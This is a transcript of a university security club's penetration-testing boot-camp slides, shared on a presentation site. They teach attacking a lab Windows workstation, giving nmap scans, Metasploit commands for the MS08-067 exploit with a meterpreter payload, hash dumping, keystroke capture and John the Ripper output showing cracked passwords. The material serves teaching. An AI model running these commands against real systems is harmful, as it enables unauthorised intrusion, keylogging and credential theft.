1 / 14

Penetration Testing 101 (Boot-camp)

Penetration Testing 101 (Boot-camp). Computer Security Group Mitchell Adair utdcsg.org. Outline. “Interactive” meeting Introduction to Backtrack A mini penetration test Scenario Methodology Enumeration, Exploitation, Post Exploitation Exercise Summary Resources. Scenario.

buzz
Download Presentation

Penetration Testing 101 (Boot-camp)

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Penetration Testing 101(Boot-camp) Computer Security Group Mitchell Adair utdcsg.org

  2. Outline “Interactive” meeting Introduction to Backtrack A mini penetration test Scenario Methodology Enumeration, Exploitation, Post Exploitation Exercise Summary Resources

  3. Scenario Company X wants you to test if their internal hosts are secure. They have given you a sample box with the default security settings the company uses for all user workstations. You take it back to the lab and begin to test it...

  4. Outline Enumeration OS, services, versions, filters Exploitation Match a service + version to a known vulnerability Exploit, getting shell access to the box Post Exploitation Shell is just the beginning... ;) Hashes, SSH / GPG keys, pivot, …

  5. Enumeration 'Nmap ("Network Mapper") is a free and open source utility for network exploration or security auditing.' - nmap.org nmap [Scan Type(s)] [Options] {target specification} Scan Types • -sS, Syn • -sT, Connect • -sA, Ack • … Options • -O, OS • -sV, services • -v, verbose • …

  6. … Enumeration nmap 192.168.1.1 Default scan, full SYN, top 1000 ports nmap -v -sV -O 192.168.1.1 -p 1-65535 Verbose, services, OS, ports 1 through 65535 nmap -PN --script=smb* -sV -O 192.168.1.1 Don't ping, run all smb* scripts, service, OS

  7. Nmap Output Not shown: 996 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds 1025/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe) ... OS details: Microsoft Windows 2000 SP0/SP1/SP2 or Windows XP SP0/SP1, Microsoft Windows XP SP1 ... Host script results: | smb-os-discovery: Windows 2000 | smb-enum-domains: | Domain: MITCHELL-32D5C5 | |_ SID: S-1-5-21-606747145-1647877149-725345543 | |_ Users: add, Administrator, Guest, s3cr3tus3r, sally ... | Anonymous shares: IPC$ |_ Restricted shares: ADMIN$, C$ ... | smb-check-vulns: |_ MS08-067: VULNERABLE

  8. Exploitation Metasploit – Penetration Testing Framework tools, libraries, modules, and user interfaces # msfconsole msf > use windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 192.168.1.1 set PAYLOAD windows/meterpreter/bind_tcp exploit

  9. Post Exploitation Gather useful information SSH & GPG keys, hashes, etc... Meterpreter “post” modules Pivot meterpreter > hashdump sysinfo keyscan_(start | stop | dump) download migrate shell

  10. … Post Exploitation We dumped the hashes... now what? Pass the hash Crack the hash John the Ripper a tool to find weak passwords of your users John [options] password-files --wordlist --users, --groups --session, --restore

  11. … Post Exploitation John --wordlist=/.../password.lst /tmp/hashes.txt Loaded 6 password hashes with no different salts (NT LM DES [64/64 BS MMX]) ABC123 (sally) SECRET (s3cr3tus3r) (Guest) BASKETB (webmaster:1) ALL (webmaster:2) ADMIN1 (Administrator) guesses: 5 time: 0:00:00:00 100% c/s: 25730 trying: SKIDOO - ZHONGGU

  12. So... let's get started Boot up to your Backtrack CD passwd /etc/init.d/networking start startx Follow along... let's pwn this box :)

  13. Summary Clearly... Company X's default user workstations needs some work. Now let's do the paperwork!... just kidding ;) Hopefully this gives everyone a hands on introduction to Backtrack, some essential tools, and the attacker's mindset & process. Feedback is always appreciated!

  14. Resources utdcsg.org Presentations, articles, resources, etc. IRC - irc.oftc.net, #utdcsg Nmap - nmap.org/5/ Metasploit - metasploit.com/ John the Ripper - openwall.com/john/

More Related